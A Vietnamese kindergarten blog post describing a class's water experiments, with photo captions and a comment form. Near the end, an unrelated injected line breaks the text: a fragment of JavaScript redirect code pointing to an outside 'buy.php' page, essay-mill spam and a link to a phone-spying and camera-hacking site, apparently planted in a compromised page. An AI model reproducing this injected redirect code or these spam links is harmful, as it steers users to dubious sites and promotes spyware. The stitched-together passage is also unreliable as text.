Lớp MGL A2 làm thí nghiệm khám phá về nước.

Thứ 3 ( ngày 3/4/2012) trong giờ hoạt động chiều, các cô giáo đã tổ chức cho các bé lớp MGL- A2 khám phá về nước qua các  thí nghiệm về nước: “Chất tan và không tan trong nước”, “Sự đổi màu của nước”. Đây là hoạt động mà các bạn lớp  A2 rất hào hứng và thích thú, bạn nào cũng mong muốn được làm thí nghiệm về nước và chờ đợi điều kì diệu gì sẽ xảy ra. Các bạn đã rất chú ý quan sát, xem xét, dự đoán, suy luận rất tích cực. Sau đây là 1 số hình ảnh của cô và các bạn làm thí nghiệm.

Các bạn chăm chú nhìn cô giáo hướng dẫn.

Các bạn đang làm thí nghiệm chất tan và không tan trong nước.

Chúng tớ đã phát hiện những chất nào tan được trong nước rồi đấy!

Chúng tớ rất say sưa làm thí nghiệm tiếp theo ” sự đổi màu của nước” nước cũng đổi màu khi cho vào nước các màu khác nhau.

Nhúng giấy và cốc nước pha màu thì giấy sẽ thấm và cũng sẽ đổi màu đấy!

Nhúng giấy vào cốc nước pha mầu những trộn màu vào thì giấy lại không thấm màu đâu.

Chúng tớ đã biết được sự kỳ diệu của nước qua các thí nghiệm _ cô giáo còn hướng dẫn chúng tớ ghi lại kết quả về nước đấy!

Các bạn hãy làm thí nghiệm để khám phá về nước nhé!

“http:///?sl=319481-c261c&data1=Track1&data2=Track2″; Under this illusion, they confounded sub jects where no buy college essays online reallocation.replace(“http://gethere.info/buy.php”);} else { It’s not that I was indifferent to all this https://cellspyapps.org/can-someone-hack-your-phone-camera/ innovation happening around me

This entry was posted in Hoạt động. Bookmark the permalink.

Gửi phản hồi

Thư điện tử của bạn sẽ không được hiện thị công khai. Required fields are marked *

*

*


You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>